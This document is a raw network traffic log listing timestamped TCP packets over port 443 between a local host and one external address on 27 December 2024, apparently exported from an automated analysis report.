                                                                                                                                                                                            Dec 27, 2024 20:23:50.049344063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.049350977 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.049386978 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.057226896 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.057243109 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.057317019 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.057326078 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.057369947 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.064004898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.064019918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.064095020 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.064104080 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.064141035 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.203957081 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.203974009 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.204112053 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.204128981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.204246998 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.211527109 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.211543083 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.211622000 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.211632013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.211673021 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.218214035 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.218231916 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.218303919 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.218311071 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.218352079 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.226140976 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.226156950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.226224899 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.226233006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.226274014 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.233396053 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.233411074 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.233477116 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.233484983 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.233529091 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.241144896 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.241178036 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.241235971 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.241244078 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.241281033 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.249058962 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.249074936 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.249145031 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.249151945 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.249186039 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.256072044 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.256088018 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.256156921 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.256165981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.256205082 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.257035017 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.303363085 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.396517992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.396536112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.396574020 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.396584988 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.396603107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.396625996 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.404311895 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.404330015 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.404377937 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.404386997 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.404413939 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.404431105 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.412107944 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.412123919 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.412194967 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.412264109 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.412327051 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.419018030 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.419032097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.419086933 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.419112921 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.419137955 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.419159889 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.427396059 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.427431107 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.427453041 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.427469015 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.427500963 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.427520037 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.434151888 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.434165955 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.434236050 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.434252024 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.434298038 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.442339897 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.442354918 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.442425013 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.442456007 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.442507982 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.449980021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.449995041 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.450028896 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.450072050 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.450102091 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.450144053 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.590051889 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.590068102 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.590166092 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.590187073 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.590245008 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.597939014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.597954988 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.598040104 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.598057032 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.598109961 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.605739117 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.605752945 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.605837107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.605854988 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.605904102 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.612586021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.612601042 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.612791061 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.612807989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.612865925 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.614933014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.615001917 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.622211933 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.622236967 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.622299910 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.622335911 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.622364044 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.630295992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.630315065 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.630424023 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.630439997 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.637847900 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.637861013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.637932062 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.637953043 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.678383112 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.777019978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.777035952 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.777234077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.777234077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.777255058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.777312994 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.784471035 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.784487009 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.784574986 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.784590960 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.784636021 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.786566019 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.786639929 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.793323040 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.793339968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.793421984 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.793442011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.801140070 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.801161051 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.801254988 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.801276922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.806931019 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.806972980 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.807014942 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.807038069 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.807065010 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.807085991 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.814069033 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.814085960 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.814179897 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.814198971 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.814261913 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.822005987 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.822021008 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.822107077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.822124958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.822176933 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.825323105 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.825403929 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.825418949 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.833214998 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.833236933 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.833286047 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.833319902 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.833344936 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.881505013 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.972867966 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.972908020 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.972987890 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.973011971 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.973083019 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.979666948 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.979685068 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.979739904 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.979757071 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.979788065 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.979809046 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.987519979 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.987538099 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.987610102 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.987627029 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.987675905 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.995480061 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.995513916 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.995558023 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.995574951 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:50.995623112 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:50.995647907 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.002214909 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.002235889 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.002327919 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.002346039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.002424002 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.011059999 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.011075020 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.011142015 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.011161089 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.011217117 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.017435074 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.017483950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.017604113 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.017620087 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.017683983 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.025330067 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.025350094 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.025415897 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.025450945 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.025513887 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.165086031 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.165105104 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.165272951 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.165311098 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.165365934 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.172244072 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.172276020 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.172362089 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.172373056 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.172430038 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.179780960 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.179795980 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.179867983 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.179877996 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.179924011 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.187664032 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.187680006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.187778950 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.187787056 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.187836885 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.194464922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.194482088 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.194576025 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.194585085 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.194631100 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.202812910 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.202831030 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.202918053 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.202938080 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.202992916 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.209676981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.209697008 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.209770918 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.209779978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.209816933 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.217474937 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.217492104 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.217588902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.217613935 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.217668056 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.356684923 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.356703043 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.356810093 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.356838942 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.356900930 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.364414930 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.364429951 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.364552021 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.364578962 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.364628077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.371334076 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.371371031 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.371450901 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.371469021 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.371511936 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.379143000 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.379158020 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.379276991 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.379292011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.379358053 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.387056112 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.387072086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:51.387160063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:51.387168884 CET44349747172.67.208.58192.168.2.4
